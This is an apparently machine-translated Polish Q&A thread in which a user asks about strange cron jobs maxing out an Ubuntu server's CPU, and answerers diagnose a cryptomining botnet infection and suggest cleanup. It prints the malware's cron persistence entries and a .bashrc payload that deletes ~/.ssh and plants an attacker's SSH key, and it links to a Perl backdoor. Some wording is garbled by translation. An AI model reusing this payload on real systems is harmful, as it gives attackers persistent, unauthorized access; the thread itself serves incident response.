Dziwne zadanie Cron zajmuje 100% serwera Ubuntu 18 LTS z procesorem

21

Wciąż pojawiają się oferty pracy w jaz-cronie i nie mam pojęcia, co robią. Zazwyczaj wysyłam kill -9, aby je zatrzymać. Zajmują 100% mojego procesora i mogą działać przez kilka dni, dopóki nie sprawdzę. Czy ktokolwiek wie, co to znaczy?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

Używam serwer Ubuntu 18 LTS w pełni aktualny od wczoraj 24.07.2019

AKTUALIZACJA

Doceniam wszystkie opinie. Odłączyłem wszystkie dyski danych i aplikacji, ponieważ jedyną rzeczą, na którą to wpłynęło, był dysk systemu operacyjnego, przynajmniej zrobiłem coś takiego poprawnie. Idę z całkowitą przebudową, z dużo większym bezpieczeństwem i bezpieczniejszymi metodami.

MCP_infiltrator
źródło
8
.firefoxcatcheprawdopodobnie nie ma nic wspólnego z firefox - czy to może być górnik bitcoinów? Spróbuj załadować pliki wykonywalne do virustotal.
Thom Wiggers,
1
Pliki obsługiwane przez to crontab to /root/.firefoxcatche/a/updi/root/.firefoxcatche/b/sync
Thom Wiggers,
2
„Nie mogę znaleźć pliku crontab, aby go wyszyfrować”. Co to znaczy? dlaczego sudo crontab -eedycja nie działa? Ale jeśli jest to kryptomer, którego nie zainstalowałeś ... zostaną one ponownie dodane. Pierwsze spojrzenie w „/root/.firefoxcatche/a/upd”, co robi.
Rinzwind
2
„Czy muszę się zalogować jako root, aby się tam dostać?” To pytanie, którego nie oczekuję od administratora. Naprawdę musisz wiedzieć, co robisz odtąd. Zmień hasło administratora JAK NAJSZYBCIEJ. Sprawdź pliki wymienione w cron. Zlikwiduj ich.
Rinzwind
1
ale to takie proste ;-) Utrzymuję ponad 10 instancji Google Cloud. Z planem awaryjnym na wszystko, co mogłem sobie wyobrazić, że pójdzie źle. Gdyby coś takiego się zdarzyło, zniszczyłbym instancję root, utworzyłbym nową, zeskanowałbym dysk danych przed klonem, zeskanował różnice, a następnie dołączył go do instancji. i zaimplementuj coś, co złapie tę osobę w pułapkę, aby nie powtórzyła się. W moim przypadku moja wypłata zależy od tego ;-)
Rinzwind

Odpowiedzi:

40

Twoja maszyna najprawdopodobniej ma infekcję kryptograficzną. Możesz zobaczyć kogoś innego zgłaszającego podobne nazwy plików i zachowanie podczas wykrywania maszyny wirtualnej w czasie rzeczywistym na platformie Azure za pomocą Centrum zabezpieczeń . Zobacz także Mój serwer Ubuntu ma wirusa ... Znalazłem go, ale nie mogę się go pozbyć ... na Reddit.

Nie możesz już ufać temu komputerowi i powinieneś go ponownie zainstalować. Zachowaj ostrożność podczas przywracania kopii zapasowych.

Thom Wiggers
źródło
8
Zgadzam się. hasło roota zostało przejęte, więc zainstaluj ponownie i zachowaj ostrożność przy tworzeniu kopii zapasowej; może też tam być.
Rinzwind
9

Twoja maszyna została zainfekowana atakiem kryptowalut. W przeszłości miałem także do czynienia z podobnym atakiem ransomware i moja baza danych została naruszona. Zrobiłem zrzut SQL dla komputera i ponownie go skonfigurowałem (ponieważ mój komputer był maszyną wirtualną hostowaną na AWS EC2). Zmodyfikowałem również grupy zabezpieczeń komputera, aby zablokować dostęp SSH i zmodyfikowałem hasła. Włączyłem także rejestrowanie, aby rejestrować zapytania i eksportować je do S3 każdej nocy.

beingadityak
źródło
4

To samo przytrafiło mi się i zauważyłem wczoraj. Sprawdziłem plik /var/log/syslogi ten adres IP (185.234.218.40) wydawał się automatycznie wykonywać cronjobs.

Sprawdziłem to na http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) i ma kilka raportów. Te pliki były edytowane przez trojana:

  • .bashrc
  • .ssh / uprawnione_klucze

Znalazłem to na końcu .bashrc(które jest wykonywane przy każdym otwarciu bash):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

Usuwa twój authorized_keysplik, który jest listą kluczy SSH, które mogą łączyć się bez hasła. Następnie dodaje klucz SSH atakującego:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

Ponadto znalazłem ten folder:, w /tmp/.X13-unix/.rsyncktórym znajduje się całe złośliwe oprogramowanie. Znalazłem nawet /tmp/.X13-unix/.rsync/c/ipplik zawierający 70 000 adresów IP, które najprawdopodobniej są innymi ofiarami lub serwerami węzłów.

Istnieją 2 rozwiązania: A:

  • Dodaj zaporę blokującą wszystkie połączenia wychodzące z wyjątkiem portu 22 i innych, które uważasz za niezbędne, i włącz fail2ban, program, który blokuje adres IP po X nieudanych próbach podania hasła

  • Zabij wszystkie zadania crona:, ps aux | grep crona następnie zabij PID, który się pojawi

  • Zmień hasło na bezpieczne

B:

  • Utwórz kopię zapasową dowolnych plików lub folderów, których potrzebujesz lub chcesz

  • Zresetuj serwer i zainstaluj ponownie Ubuntu lub bezpośrednio utwórz nową kroplę

    Jak powiedział Thom Wiggers, z pewnością jesteś częścią botnetu wydobywającego bitcoiny, a twój serwer ma backdoor . Backdoor wykorzystuje exploita perla, znajdujący się tutaj plik: /tmp/.X13-unix/.rsync/b/runzawierający ten ( https://pastebin.com/ceP2jsUy )

Najbardziej podejrzane foldery, które znalazłem, to:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (który był edytowany)

  • ~/.firefoxcatche

Na koniec jest artykuł dotyczący Perla Backdoor: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

Mam nadzieję, że uznasz to za przydatne.

Oqhax
źródło
Wyczyściłem dysk OS i ponownie zainstalowałem Ubuntu, utworzyłem nowe hasło, które jest dość długie, i nowe klucze ssh
MCP_infiltrator
Tak, to dobre rozwiązanie :)
Oqhax
To była bardzo pomocna odpowiedź - dziękuję za zrozumienie tego, co ~/.bashrczostało edytowane. Stwierdziłem, że aby zabić fałszywkę rsync, musiałem wydać kill -9 <pid>.
Benny Hill